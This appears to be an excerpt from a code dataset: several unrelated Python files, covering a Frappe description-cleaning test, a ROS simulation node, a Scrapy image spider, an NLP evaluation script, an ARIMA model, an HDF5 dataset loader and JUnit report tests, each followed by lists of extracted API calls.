frappe.db.set_value("Stock Settings", None, "clean_description_html", 0)
def test_settings(self):
item = frappe.get_doc(dict(
doctype = 'Item',
item_code = 'Item for description test',
item_group = 'Products',
description = '<p><span style="font-size: 12px;">Drawing No. 07-xxx-PO132<br></span><span style="font-size: 12px;">1800 x 1685 x 750<br></span><span style="font-size: 12px;">All parts made of Marine Ply<br></span><span style="font-size: 12px;">Top w/ Corian dd<br></span><span style="font-size: 12px;">CO, CS, VIP Day Cabin</span></p>'
)).insert()
settings = frappe.get_single('Stock Settings')
settings.clean_description_html = 1
settings.save()
item.reload()
self.assertEqual(item.description, '<p>Drawing No. 07-xxx-PO132<br>1800 x 1685 x 750<br>All parts made of Marine Ply<br>Top w/ Corian dd<br>CO, CS, VIP Day Cabin</p>')
item.delete()
def test_clean_html(self):
settings = frappe.get_single('Stock Settings')
settings.clean_description_html = 1
settings.save()
item = frappe.get_doc(dict(
doctype = 'Item',
item_code = 'Item for description test',
item_group = 'Products',
description = '<p><span style="font-size: 12px;">Drawing No. 07-xxx-PO132<br></span><span style="font-size: 12px;">1800 x 1685 x 750<br></span><span style="font-size: 12px;">All parts made of Marine Ply<br></span><span style="font-size: 12px;">Top w/ Corian dd<br></span><span style="font-size: 12px;">CO, CS, VIP Day Cabin</span></p>'
)).insert()
self.assertEqual(item.description, '<p>Drawing No. 07-xxx-PO132<br>1800 x 1685 x 750<br>All parts made of Marine Ply<br>Top w/ Corian dd<br>CO, CS, VIP Day Cabin</p>')
item.delete()
| [
"frappe.get_single",
"frappe.db.set_value"
] | [((247, 319), 'frappe.db.set_value', 'frappe.db.set_value', (['"""Stock Settings"""', 'None', '"""clean_description_html"""', '(0)'], {}), "('Stock Settings', None, 'clean_description_html', 0)\n", (266, 319), False, 'import frappe\n'), ((837, 872), 'frappe.get_single', 'frappe.get_single', (['"""Stock Settings"""'], {}), "('Stock Settings')\n", (854, 872), False, 'import frappe\n'), ((1176, 1211), 'frappe.get_single', 'frappe.get_single', (['"""Stock Settings"""'], {}), "('Stock Settings')\n", (1193, 1211), False, 'import frappe\n')] |
#!/usr/bin/env python
import rospy
from std_msgs.msg import Float64
import random
possibleLayers = [140, 50, 80, 200, 100]
cur_position = 0.0
def position_callback(msg):
global cur_position
cur_position = msg.data
#Build the layers simulation, then publish material strengths. Lasts 100 seconds.
def runLayersSim():
numLayers = random.randint(10,20)
a = 1
layers = []
while (a < 1000):
size = random.randint(a + 1,1000) - a
strength = getNextLayerStrength()
setNextLayer(size,strength,layers)
a = a + size
pub = rospy.Publisher('material_strength', Float64, queue_size = 10)
rospy.init_node('layers_node', anonymous=True)
rate = rospy.Rate(10)
rospy.Subscriber("/drill_motor/cur_position", Float64, position_callback)
while((not rospy.is_shutdown()) and cur_position < 1000):
pub.publish(layers[int(cur_position)])
rate.sleep()
#Get the strength of the next layer from the list of possible layer strengths.
def getNextLayerStrength():
l = random.randint(0,len(possibleLayers) - 1)
return possibleLayers[l]
#Build the next layer of the simulation.
def setNextLayer(size,strength,layers):
for i in range(1,size):
layers.append(strength)
if __name__ == '__main__':
runLayersSim()
| [
"rospy.Subscriber",
"rospy.is_shutdown",
"rospy.init_node",
"rospy.Rate",
"rospy.Publisher",
"random.randint"
] | [((343, 365), 'random.randint', 'random.randint', (['(10)', '(20)'], {}), '(10, 20)\n', (357, 365), False, 'import random\n'), ((575, 635), 'rospy.Publisher', 'rospy.Publisher', (['"""material_strength"""', 'Float64'], {'queue_size': '(10)'}), "('material_strength', Float64, queue_size=10)\n", (590, 635), False, 'import rospy\n'), ((642, 688), 'rospy.init_node', 'rospy.init_node', (['"""layers_node"""'], {'anonymous': '(True)'}), "('layers_node', anonymous=True)\n", (657, 688), False, 'import rospy\n'), ((700, 714), 'rospy.Rate', 'rospy.Rate', (['(10)'], {}), '(10)\n', (710, 714), False, 'import rospy\n'), ((719, 792), 'rospy.Subscriber', 'rospy.Subscriber', (['"""/drill_motor/cur_position"""', 'Float64', 'position_callback'], {}), "('/drill_motor/cur_position', Float64, position_callback)\n", (735, 792), False, 'import rospy\n'), ((428, 455), 'random.randint', 'random.randint', (['(a + 1)', '(1000)'], {}), '(a + 1, 1000)\n', (442, 455), False, 'import random\n'), ((808, 827), 'rospy.is_shutdown', 'rospy.is_shutdown', ([], {}), '()\n', (825, 827), False, 'import rospy\n')] |
import scrapy
import re
from scrapy.linkextractors import LinkExtractor
from scrapy.spiders import CrawlSpider, Rule
from ..items import ImagescraperItem
class ImageCrawlSpiderSpider(CrawlSpider):
name = "image_crawl_spider"
allowed_domains = ["books.toscrape.com"]
def start_requests(self):
url = "http://books.toscrape.com/"
yield scrapy.Request(url=url)
rules = (Rule(LinkExtractor(allow=r"catalogue/"), callback="parse_image", follow=True),)
def parse_image(self, response):
if response.xpath('//div[@class="item active"]/img').get() is not None:
img = response.xpath('//div[@class="item active"]/img/@src').get()
"""
Computing the Absolute path of the image file.
"image_urls" require absolute path, not relative path
"""
m = re.match(r"^(?:../../)(.*)$", img).group(1)
url = "http://books.toscrape.com/"
img_url = "".join([url, m])
image = ImagescraperItem()
image["image_urls"] = [img_url] # "image_urls" must be a list
yield image
| [
"scrapy.Request",
"scrapy.linkextractors.LinkExtractor",
"re.match"
] | [((364, 387), 'scrapy.Request', 'scrapy.Request', ([], {'url': 'url'}), '(url=url)\n', (378, 387), False, 'import scrapy\n'), ((407, 440), 'scrapy.linkextractors.LinkExtractor', 'LinkExtractor', ([], {'allow': '"""catalogue/"""'}), "(allow='catalogue/')\n", (420, 440), False, 'from scrapy.linkextractors import LinkExtractor\n'), ((852, 885), 're.match', 're.match', (['"""^(?:../../)(.*)$"""', 'img'], {}), "('^(?:../../)(.*)$', img)\n", (860, 885), False, 'import re\n')] |
import os
import argparse
import subprocess
import random
import edlib
from typing import List
from collections import Counter
import stanza
class ExtractMetric(object):
"""used for precision recall"""
def __init__(self, nume=0, denom_p=0, denom_r=0, precision=0, recall=0, f1=0):
super(ExtractMetric, self).__init__()
self.nume = nume
self.denom_p = denom_p
self.denom_r = denom_r
self.precision = precision
self.recall = recall
self.f1 = f1
def read_file(fname, len_cut):
res1, res2 = [], []
with open(fname) as fin:
for line in fin:
x, y = line.rstrip().split('\t')
if len(x.split()) > len_cut or len(y.split()) > len_cut:
continue
res1.append(x)
res2.append(y)
return res1, res2
def write_file(fname: str, data: List[str]):
with open(fname, 'w') as fout:
for sent in data:
if isinstance(sent, list):
fout.write('{}\n'.format(' '.join(sent)))
else:
fout.write('{}\n'.format(sent))
def eval_edit(prototype, example):
def flat_cigar(cigar):
"""flatten the result path returned by edlib.align
"""
r = []
pointer = 0
while pointer < len(cigar):
num = []
while cigar[pointer].isdigit():
num.append(cigar[pointer])
pointer += 1
num = int(''.join(num))
r.extend([cigar[pointer]] * num)
pointer += 1
return r
res = {}
for p_sent, e_sent in zip(prototype, example):
p_pos = [x.upos for x in p_sent.words]
e_pos = [x.upos for x in e_sent.words]
p_text = [x.text for x in p_sent.words]
e_text = [x.text for x in e_sent.words]
edit_operation = edlib.align(e_text, p_text, task='path')
edit_operation = flat_cigar(edit_operation['cigar'])
new_p_text = []
new_e_text = []
new_p_pos = []
new_e_pos = []
src_cur = tgt_cur = 0
for edit in edit_operation:
if edit == '=' or edit == 'X':
new_p_text.append(p_text[src_cur])
new_p_pos.append(p_pos[src_cur])
new_e_text.append(e_text[tgt_cur])
new_e_pos.append(e_pos[tgt_cur])
src_cur += 1
tgt_cur += 1
elif edit == 'I':
new_p_text.append(-1)
new_p_pos.append(-1)
new_e_text.append(e_text[tgt_cur])
new_e_pos.append(e_pos[tgt_cur])
tgt_cur += 1
elif edit == 'D':
new_p_text.append(p_text[src_cur])
new_p_pos.append(p_pos[src_cur])
new_e_text.append(-1)
new_e_pos.append(-1)
src_cur += 1
else:
raise ValueError('{} edit operation is invalid!'.format(edit))
for i, edit in enumerate(edit_operation):
if edit not in res:
res[edit] = Counter()
if edit == '=':
res[edit]['{}={}'.format(new_p_pos[i], new_e_pos[i])] += 1
elif edit == 'X':
res[edit]['{}->{}'.format(new_p_pos[i], new_e_pos[i])] += 1
elif edit == 'I':
res[edit]['+{}'.format(new_e_pos[i])] += 1
elif edit == 'D':
res[edit]['-{}'.format(new_p_pos[i])] += 1
else:
raise ValueError
return res
def eval_f1(prototype, example):
res = {}
for p_sent, e_sent in zip(prototype, example):
p_pos = [x.upos for x in p_sent.words]
e_pos = [x.upos for x in e_sent.words]
p_text = [x.text for x in p_sent.words]
e_text = [x.text for x in e_sent.words]
e_word_counter = Counter(e_text)
for word, pos in zip(p_text, p_pos):
if pos not in res:
res[pos] = ExtractMetric(
nume=0,
denom_p=0,
denom_r=0,
precision=0,
recall=0,
f1=0
)
res[pos].denom_r += 1
if e_word_counter[word] > 0:
e_word_counter[word] -= 1
res[pos].nume += 1
e_pos_counter = Counter(e_pos)
for k, v in e_pos_counter.items():
if k not in res:
res[k] = ExtractMetric(
nume=0,
denom_p=0,
denom_r=0,
precision=0,
recall=0,
f1=0
)
res[k].denom_p += v
for k, v in res.items():
if res[k].denom_p != 0 and res[k].denom_r != 0 and res[k].nume != 0:
res[k].precision = res[k].nume / res[k].denom_p
res[k].recall = res[k].nume / res[k].denom_r
res[k].f1 = 2 * res[k].precision * res[k].recall / (res[k].precision + res[k].recall)
return res
def sentence_bleu(ref_path, hypo_path):
sent_bleu = subprocess.getoutput(
"fairseq-score --ref {} --sys {} --sentence-bleu".format(ref_path, hypo_path))
bleu_list = [float(line.split()[3].rstrip(',')) for line in sent_bleu.split('\n')[1:]]
return sum(bleu_list) / len(bleu_list)
def generate_rand_prototype(exp_dir, num):
dataset_to_template = {
"coco40k": "support_prototype/datasets/coco/coco.template.40k.txt",
"yelp": "support_prototype/datasets/yelp_data/yelp.template.50k.lower.txt",
"yelp_large": "support_prototype/datasets/yelp_large_data/yelp_large.template.100k.txt",
}
def parse_exp_dir(name):
dataset = name.rstrip('/').split('/')[-1].split('_')[0]
return dataset
dataset = parse_exp_dir(exp_dir)
return subprocess.getoutput(
"shuf -n {} {}".format(num, dataset_to_template[dataset])).split('\n')
parser = argparse.ArgumentParser(description='Evaluate analysis metrics')
parser.add_argument('--prefix', type=str, choices=['inference', 'generation'],
help='prediction file prefix')
parser.add_argument('--exp-dir', type=str, help='output directory')
args = parser.parse_args()
fout = open(os.path.join(args.exp_dir, 'analysis_{}_res.txt'.format(args.prefix)), 'w')
len_cut = 1000
prototypes, examples = read_file(os.path.join(args.exp_dir, '{}_analysis_input.txt'.format(args.prefix)), len_cut=len_cut)
prototype_path = os.path.join(args.exp_dir, 'prototype.txt')
prototype_pos_path = os.path.join(args.exp_dir, 'prototype_pos.txt')
prototype_rand_path = os.path.join(args.exp_dir, 'prototype_rand.txt')
prototype_pos_rand_path = os.path.join(args.exp_dir, 'prototype_pos_rand.txt')
example_path = os.path.join(args.exp_dir, 'example.txt')
example_pos_path = os.path.join(args.exp_dir, 'example_pos.txt')
prototypes_rand = generate_rand_prototype(args.exp_dir, len(examples))
write_file(prototype_path, prototypes)
write_file(example_path, examples)
write_file(prototype_rand_path, prototypes_rand)
# surface BLEU
# bleu = subprocess.getoutput(
# "./support_prototype/scripts/multi-bleu.perl {} < {}".format(prototype_path, example_rand_path))
bleu = sentence_bleu(prototype_rand_path, example_path)
print('Regular BLEU (random baseline): \n{}'.format(bleu))
fout.write('Regular BLEU (random baseline): \n{}'.format(bleu))
fout.write('\n\n\n')
# bleu = subprocess.getoutput(
# "./support_prototype/scripts/multi-bleu.perl {} < {}".format(prototype_path, example_path))
bleu = sentence_bleu(prototype_path, example_path)
print('Regular BLEU: \n{}'.format(bleu))
fout.write('Regular BLEU: \n{}'.format(bleu))
fout.write('\n\n\n')
# POS tagging
print('POS tagging')
nlp = stanza.Pipeline(lang='en', processors='tokenize,mwt,pos', tokenize_pretokenized=True)
prototype_doc = nlp('\n'.join(prototypes))
example_doc = nlp('\n'.join(examples))
prototype_rand_doc = nlp('\n'.join(prototypes_rand))
prototypes_pos = [[word.upos for word in sent.words] for sent in prototype_doc.sentences]
examples_pos = [[word.upos for word in sent.words] for sent in example_doc.sentences]
prototypes_pos_rand = [[word.upos for word in sent.words]for sent in prototype_rand_doc.sentences]
write_file(prototype_pos_path, prototypes_pos)
write_file(example_pos_path, examples_pos)
write_file(prototype_pos_rand_path, prototypes_pos_rand)
# POS BLEU
# bleu = subprocess.getoutput(
# "./support_prototype/scripts/multi-bleu.perl {} < {}".format(prototype_pos_path, example_pos_rand_path))
bleu = sentence_bleu(prototype_pos_rand_path, example_pos_path)
print('POS BLEU (random baseline): \n{}'.format(bleu))
fout.write('POS BLEU (random baseline): \n{}'.format(bleu))
fout.write('\n\n\n')
# bleu = subprocess.getoutput(
# "./support_prototype/scripts/multi-bleu.perl {} < {}".format(prototype_pos_path, example_pos_path))
bleu = sentence_bleu(prototype_pos_path, example_pos_path)
print('POS BLEU: \n{}'.format(bleu))
fout.write('POS BLEU: \n{}'.format(bleu))
fout.write('\n\n\n')
# break down precision and recall
print("compute precision, recall, f1")
assert len(prototypes) == len(prototypes_pos)
assert len(examples) == len(examples_pos)
res = eval_f1(list(prototype_rand_doc.sentences), list(example_doc.sentences))
res = sorted(res.items(), key=lambda item: -item[1].f1)
fout.write('random baseline precision-recall\n')
fout.write('POS recall precision f1\n')
for k, v in res:
fout.write('{} {} {} {}\n'.format(k, v.recall, v.precision, v.f1))
fout.write('\n\n\n')
res = eval_f1(list(prototype_doc.sentences), list(example_doc.sentences))
res = sorted(res.items(), key=lambda item: -item[1].f1)
fout.write('precision-recall\n')
fout.write('POS recall precision f1\n')
for k, v in res:
fout.write('{} {} {} {}\n'.format(k, v.recall, v.precision, v.f1))
fout.write('\n\n\n')
# edit operations
print("edit analysis")
res = eval_edit(list(prototype_doc.sentences), list(example_doc.sentences))
total = sum([sum(v.values()) for k, v in res.items()])
fout.write('total: {}\n'.format(total))
res = sorted(res.items(), key=lambda item: (-sum(item[1].values())))
for k, v in res:
fout.write('{}: {}\n'.format(k, sum(v.values())))
for k1, v1 in v.most_common():
fout.write('{}: {} ({:.3f}), '.format(k1, v1, v1 / sum(v.values())))
fout.write('\n\n')
fout.close()
| [
"edlib.align",
"argparse.ArgumentParser",
"os.path.join",
"collections.Counter",
"stanza.Pipeline"
] | [((6056, 6120), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {'description': '"""Evaluate analysis metrics"""'}), "(description='Evaluate analysis metrics')\n", (6079, 6120), False, 'import argparse\n'), ((6576, 6619), 'os.path.join', 'os.path.join', (['args.exp_dir', '"""prototype.txt"""'], {}), "(args.exp_dir, 'prototype.txt')\n", (6588, 6619), False, 'import os\n'), ((6641, 6688), 'os.path.join', 'os.path.join', (['args.exp_dir', '"""prototype_pos.txt"""'], {}), "(args.exp_dir, 'prototype_pos.txt')\n", (6653, 6688), False, 'import os\n'), ((6712, 6760), 'os.path.join', 'os.path.join', (['args.exp_dir', '"""prototype_rand.txt"""'], {}), "(args.exp_dir, 'prototype_rand.txt')\n", (6724, 6760), False, 'import os\n'), ((6787, 6839), 'os.path.join', 'os.path.join', (['args.exp_dir', '"""prototype_pos_rand.txt"""'], {}), "(args.exp_dir, 'prototype_pos_rand.txt')\n", (6799, 6839), False, 'import os\n'), ((6856, 6897), 'os.path.join', 'os.path.join', (['args.exp_dir', '"""example.txt"""'], {}), "(args.exp_dir, 'example.txt')\n", (6868, 6897), False, 'import os\n'), ((6917, 6962), 'os.path.join', 'os.path.join', (['args.exp_dir', '"""example_pos.txt"""'], {}), "(args.exp_dir, 'example_pos.txt')\n", (6929, 6962), False, 'import os\n'), ((7842, 7931), 'stanza.Pipeline', 'stanza.Pipeline', ([], {'lang': '"""en"""', 'processors': '"""tokenize,mwt,pos"""', 'tokenize_pretokenized': '(True)'}), "(lang='en', processors='tokenize,mwt,pos',\n tokenize_pretokenized=True)\n", (7857, 7931), False, 'import stanza\n'), ((1871, 1911), 'edlib.align', 'edlib.align', (['e_text', 'p_text'], {'task': '"""path"""'}), "(e_text, p_text, task='path')\n", (1882, 1911), False, 'import edlib\n'), ((3907, 3922), 'collections.Counter', 'Counter', (['e_text'], {}), '(e_text)\n', (3914, 3922), False, 'from collections import Counter\n'), ((4420, 4434), 'collections.Counter', 'Counter', (['e_pos'], {}), '(e_pos)\n', (4427, 4434), False, 'from collections import Counter\n'), ((3122, 3131), 'collections.Counter', 'Counter', ([], {}), '()\n', (3129, 3131), False, 'from collections import Counter\n')] |
""" The ARIMA model. """
import torch
import numpy as np
class ARIMA(torch.nn.Module):
"""ARIMA [summary]
"""
def __init__(self,
p: int = 0,
d: int = 0,
q: int = 0) -> None:
"""__init__ General ARIMA model constructor.
Args:
p (int): The number of lag observations included in the model,
also called the lag order.
d (int): The number of times that the raw observations are
differenced, also called the degree of differencing.
q (int): The size of the moving average window,
also called the order of moving average.
"""
super(ARIMA, self).__init__()
self.p = p
self.pWeights = torch.rand(p)
self.pWeights.requires_grad = True
self.q = q
self.qWeights = torch.rand(q)
self.qWeights.requires_grad = True
self.d = d
self.dWeights = torch.rand(d)
self.dWeights.requires_grad = True
self.drift = torch.rand(1)
pass
def forward(self, x: torch.Tensor, err: torch.Tensor) -> torch.Tensor:
"""forward the function that defines the ARIMA(0,1,1) model.
It was written specifically for the case of ARIMA(0,1,1).
Args:
x (torch.Tensor): The input data. All the past observations
err (torch.Tensor): The error term. A normal distribution vector.
Returns:
torch.Tensor: The output of the model. The current prediction.
"""
zData = torch.diff(x)
zPred = self.dWeights*zData[-1] + \
self.qWeights*err[-2] + err[-1] + self.drift
aPred = zPred + x[-1]
return aPred
def generateSample(self, length: int) -> torch.Tensor:
"""generateSample An helper function to generate a sample of data.
Args:
length (int): The length of the sample.
Returns:
torch.Tensor: The generated sample.
"""
sample = torch.zeros(length)
noise = torch.tensor(np.random.normal(
loc=0, scale=1, size=length), dtype=torch.float32)
sample[0] = noise[0]
with torch.no_grad():
for i in range(length-2):
sample[i+2] = self.forward(sample[:i+2], noise[:i+2])
pass
return sample
def fit(self,
trainData: torch.Tensor,
epochs: int,
learningRate: float) -> None:
"""fit A function to fit the model. It is a wrapper of the
Args:
trainData (torch.Tensor): The training data.
epochs (int): The number of epochs.
learningRate (float): The learning rate.
"""
dataLength = len(trainData)
errors = torch.tensor(np.random.normal(
loc=0, scale=1, size=dataLength), dtype=torch.float32)
for epoch in range(epochs):
prediction = torch.zeros(dataLength)
for i in range(dataLength-2):
prediction[i +
2] = self.forward(trainData[0:i+2], errors[0:i+2])
pass
loss = torch.mean(torch.pow(trainData - prediction, 2))
print(f'Epoch {epoch} Loss {loss}')
loss.backward()
self.dWeights.data = self.dWeights.data - \
learningRate * self.dWeights.grad.data
self.dWeights.grad.data.zero_()
self.qWeights.data = self.qWeights.data - \
learningRate * self.qWeights.grad.data
self.qWeights.grad.data.zero_()
pass
| [
"numpy.random.normal",
"torch.pow",
"torch.diff",
"torch.no_grad",
"torch.zeros",
"torch.rand"
] | [((789, 802), 'torch.rand', 'torch.rand', (['p'], {}), '(p)\n', (799, 802), False, 'import torch\n'), ((889, 902), 'torch.rand', 'torch.rand', (['q'], {}), '(q)\n', (899, 902), False, 'import torch\n'), ((989, 1002), 'torch.rand', 'torch.rand', (['d'], {}), '(d)\n', (999, 1002), False, 'import torch\n'), ((1067, 1080), 'torch.rand', 'torch.rand', (['(1)'], {}), '(1)\n', (1077, 1080), False, 'import torch\n'), ((1591, 1604), 'torch.diff', 'torch.diff', (['x'], {}), '(x)\n', (1601, 1604), False, 'import torch\n'), ((2054, 2073), 'torch.zeros', 'torch.zeros', (['length'], {}), '(length)\n', (2065, 2073), False, 'import torch\n'), ((2103, 2148), 'numpy.random.normal', 'np.random.normal', ([], {'loc': '(0)', 'scale': '(1)', 'size': 'length'}), '(loc=0, scale=1, size=length)\n', (2119, 2148), True, 'import numpy as np\n'), ((2226, 2241), 'torch.no_grad', 'torch.no_grad', ([], {}), '()\n', (2239, 2241), False, 'import torch\n'), ((2835, 2884), 'numpy.random.normal', 'np.random.normal', ([], {'loc': '(0)', 'scale': '(1)', 'size': 'dataLength'}), '(loc=0, scale=1, size=dataLength)\n', (2851, 2884), True, 'import numpy as np\n'), ((2981, 3004), 'torch.zeros', 'torch.zeros', (['dataLength'], {}), '(dataLength)\n', (2992, 3004), False, 'import torch\n'), ((3207, 3243), 'torch.pow', 'torch.pow', (['(trainData - prediction)', '(2)'], {}), '(trainData - prediction, 2)\n', (3216, 3243), False, 'import torch\n')] |
#import
import os
#import torch
#import torch.nn as nn
import torch.utils.data as Data
#import torchvision
import matplotlib.pyplot as plt
import h5py
#from torch.autograd import Variable
import numpy as np
import torch
class rawdataDataset(Data.Dataset):
def __init__(self):
super(rawdataDataset, self).__init__()
#def __init__(self, filename, root_dir, transform=None):
# self.frame = h5py.File(root_dir + filename, 'r')
# self.root_dir = root_dir
# self.transform = transform
def name(self):
return 'rawdataDataset'
@staticmethod
def modify_commandline_options(parser, is_train):
return parser
def initialize(self, opt):
self.opt = opt
self.root = opt.dataroot
self.dir_AB = os.path.join(opt.dataroot, opt.phase) # phase: train test
#self.AB_paths = sorted(make_dataset(self.dir_AB))
self.A_paths = self.dir_AB + "/A.h5"
self.B_paths = self.dir_AB + "/B.h5"
self.frameA = h5py.File(self.A_paths, 'r')
self.frameB = h5py.File(self.B_paths, 'r')
#assert(opt.resize_or_crop == 'resize_and_crop')
def __len__(self):
return len(self.frameA)
def __getitem__(self, index):
#img_name = torch.FloatTensor([[ self.frame["pic" + str(index)] ]])
#img_name = Variable(torch.FloatTensor([[ self.frame["pic" + str(index)] ]])
A = self.frameA["A" + str(index + 1)]
B = self.frameB["B" + str(index + 1)]
#A = torch.FloatTensor([[ self.frameA["A" + str(index)] ]])
#B = torch.FloatTensor([[ self.frameB["B" + str(index)] ]])
#AB_path = self.AB_paths[index]
#AB = Image.open(AB_path).convert('RGB')
#w, h = AB.size
#w2 = int(w / 2)
#A = AB.crop((0, 0, w2, h)).resize((self.opt.loadSize, self.opt.loadSize), Image.BICUBIC)
#B = AB.crop((w2, 0, w, h)).resize((self.opt.loadSize, self.opt.loadSize), Image.BICUBIC)
#A = transforms.ToTensor()(A)
#B = transforms.ToTensor()(B)
#w_offset = random.randint(0, max(0, self.opt.loadSize - self.opt.fineSize - 1))
#h_offset = random.randint(0, max(0, self.opt.loadSize - self.opt.fineSize - 1))
#A = A[:, h_offset:h_offset + self.opt.fineSize, w_offset:w_offset + self.opt.fineSize]
#B = B[:, h_offset:h_offset + self.opt.fineSize, w_offset:w_offset + self.opt.fineSize]
#A = transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5))(A)
#B = transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5))(B)
if self.opt.which_direction == 'BtoA':
input_nc = self.opt.output_nc
output_nc = self.opt.input_nc
else:
input_nc = self.opt.input_nc
output_nc = self.opt.output_nc
#return img_name
return {'A' : A, 'B' : B, 'A_paths' : self.A_paths, 'B_paths' : self.B_paths}
#%hist -f rawdata_dataset.py
| [
"os.path.join",
"h5py.File"
] | [((796, 833), 'os.path.join', 'os.path.join', (['opt.dataroot', 'opt.phase'], {}), '(opt.dataroot, opt.phase)\n', (808, 833), False, 'import os\n'), ((1025, 1053), 'h5py.File', 'h5py.File', (['self.A_paths', '"""r"""'], {}), "(self.A_paths, 'r')\n", (1034, 1053), False, 'import h5py\n'), ((1076, 1104), 'h5py.File', 'h5py.File', (['self.B_paths', '"""r"""'], {}), "(self.B_paths, 'r')\n", (1085, 1104), False, 'import h5py\n')] |
"""
Copyright 2012-2019 <NAME>
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import datetime
import unittest
from unittest.mock import Mock
import urllib.error
from dateutil.tz import tzutc, tzlocal
from hqlib.metric_source import JunitTestReport
class JunitTestReportTest(unittest.TestCase):
""" Unit tests for the Junit test report class. """
# pylint: disable=protected-access
def setUp(self):
self.__junit = JunitTestReport()
def test_test_report(self):
""" Test retrieving a Junit test report. """
self.__junit._url_read = Mock(
return_value='<testsuites>'
' <testsuite tests="12" failures="2" errors="0" skipped="1" disabled="0">'
' <testcase><failure/></testcase>'
' <testcase><failure/></testcase>'
' </testsuite>'
'</testsuites>')
self.assertEqual(2, self.__junit.failed_tests('url'))
self.assertEqual(9, self.__junit.passed_tests('url'))
self.assertEqual(1, self.__junit.skipped_tests('url'))
def test_multiple_test_suites(self):
""" Test retrieving a Junit test report with multiple suites. """
self.__junit._url_read = Mock(
return_value='<testsuites>'
' <testsuite tests="5" failures="1" errors="0" skipped="1" disabled="1">'
' <testcase><failure/><failure/></testcase>'
' </testsuite>'
' <testsuite tests="3" failures="1" errors="1" skipped="0" disabled="0">'
' <testcase><failure/></testcase>'
' </testsuite>'
'</testsuites>')
self.assertEqual(3, self.__junit.failed_tests('url'))
self.assertEqual(3, self.__junit.passed_tests('url'))
self.assertEqual(2, self.__junit.skipped_tests('url'))
def test_http_error(self):
""" Test that the default is returned when a HTTP error occurs. """
self.__junit._url_read = Mock(side_effect=urllib.error.HTTPError(None, None, None, None, None))
self.assertEqual(-1, self.__junit.failed_tests('raise'))
self.assertEqual(-1, self.__junit.passed_tests('raise'))
self.assertEqual(-1, self.__junit.skipped_tests('raise'))
def test_missing_url(self):
""" Test that the default is returned when no urls are provided. """
self.assertEqual(-1, self.__junit.failed_tests())
self.assertEqual(-1, self.__junit.passed_tests())
self.assertEqual(-1, self.__junit.skipped_tests())
self.assertEqual(datetime.datetime.min, self.__junit.datetime())
def test_incomplete_xml(self):
""" Test that the default is returned when the xml is incomplete. """
self.__junit._url_read = Mock(return_value='<testsuites></testsuites>')
self.assertEqual(-1, self.__junit.failed_tests('url'))
def test_faulty_xml(self):
""" Test incorrect XML. """
self.__junit._url_read = Mock(return_value='<testsuites><bla>')
self.assertEqual(-1, self.__junit.failed_tests('url'))
def test_datetime_with_faulty_xml(self):
""" Test incorrect XML. """
self.__junit._url_read = Mock(return_value='<testsuites><bla>')
self.assertEqual(datetime.datetime.min, self.__junit.datetime('url'))
def test_report_datetime(self):
""" Test that the date and time of the test suite is returned. """
self.__junit._url_read = Mock(
return_value='<testsuites>'
' <testsuite name="Art" timestamp="2016-07-07T12:26:44">'
' </testsuite>'
'</testsuites>')
self.assertEqual(
datetime.datetime(2016, 7, 7, 12, 26, 44, tzinfo=tzutc()).astimezone(tzlocal()).replace(tzinfo=None),
self.__junit.datetime('url'))
def test_missing_report_datetime(self):
""" Test that the minimum datetime is returned if the url can't be opened. """
self.__junit._url_read = Mock(side_effect=urllib.error.HTTPError(None, None, None, None, None))
self.assertEqual(datetime.datetime.min, self.__junit.datetime('url'))
def test_incomplete_xml_datetime(self):
""" Test that the minimum datetime is returned when the xml is incomplete. """
self.__junit._url_read = Mock(return_value='<testsuites></testsuites>')
self.assertEqual(datetime.datetime.min, self.__junit.datetime('url'))
def test_incomplete_xml_no_timestamp(self):
""" Test that the minimum datetime is returned when the xml is incomplete. """
self.__junit._url_read = Mock(return_value='<testsuites><testsuite></testsuite></testsuites>')
self.assertEqual(datetime.datetime.min, self.__junit.datetime('url'))
def test_urls(self):
""" Test that the urls point to the HTML versions of the reports. """
self.assertEqual(['http://server/html/htmlReport.html'],
self.__junit.metric_source_urls('http://server/junit/junit.xml'))
def test_url_regexp(self):
""" Test that the default regular expression to generate the HTML version of the urls can be changed. """
junit = JunitTestReport(metric_source_url_re="junit.xml$", metric_source_url_repl="junit.html")
self.assertEqual(['http://server/junit.html'], junit.metric_source_urls('http://server/junit.xml'))
| [
"dateutil.tz.tzutc",
"unittest.mock.Mock",
"hqlib.metric_source.JunitTestReport",
"dateutil.tz.tzlocal"
] | [((921, 938), 'hqlib.metric_source.JunitTestReport', 'JunitTestReport', ([], {}), '()\n', (936, 938), False, 'from hqlib.metric_source import JunitTestReport\n'), ((1058, 1271), 'unittest.mock.Mock', 'Mock', ([], {'return_value': '"""<testsuites> <testsuite tests="12" failures="2" errors="0" skipped="1" disabled="0"> <testcase><failure/></testcase> <testcase><failure/></testcase> </testsuite></testsuites>"""'}), '(return_value=\n \'<testsuites> <testsuite tests="12" failures="2" errors="0" skipped="1" disabled="0"> <testcase><failure/></testcase> <testcase><failure/></testcase> </testsuite></testsuites>\'\n )\n', (1062, 1271), False, 'from unittest.mock import Mock\n'), ((1751, 2059), 'unittest.mock.Mock', 'Mock', ([], {'return_value': '"""<testsuites> <testsuite tests="5" failures="1" errors="0" skipped="1" disabled="1"> <testcase><failure/><failure/></testcase> </testsuite> <testsuite tests="3" failures="1" errors="1" skipped="0" disabled="0"> <testcase><failure/></testcase> </testsuite></testsuites>"""'}), '(return_value=\n \'<testsuites> <testsuite tests="5" failures="1" errors="0" skipped="1" disabled="1"> <testcase><failure/><failure/></testcase> </testsuite> <testsuite tests="3" failures="1" errors="1" skipped="0" disabled="0"> <testcase><failure/></testcase> </testsuite></testsuites>\'\n )\n', (1755, 2059), False, 'from unittest.mock import Mock\n'), ((3359, 3405), 'unittest.mock.Mock', 'Mock', ([], {'return_value': '"""<testsuites></testsuites>"""'}), "(return_value='<testsuites></testsuites>')\n", (3363, 3405), False, 'from unittest.mock import Mock\n'), ((3570, 3608), 'unittest.mock.Mock', 'Mock', ([], {'return_value': '"""<testsuites><bla>"""'}), "(return_value='<testsuites><bla>')\n", (3574, 3608), False, 'from unittest.mock import Mock\n'), ((3787, 3825), 'unittest.mock.Mock', 'Mock', 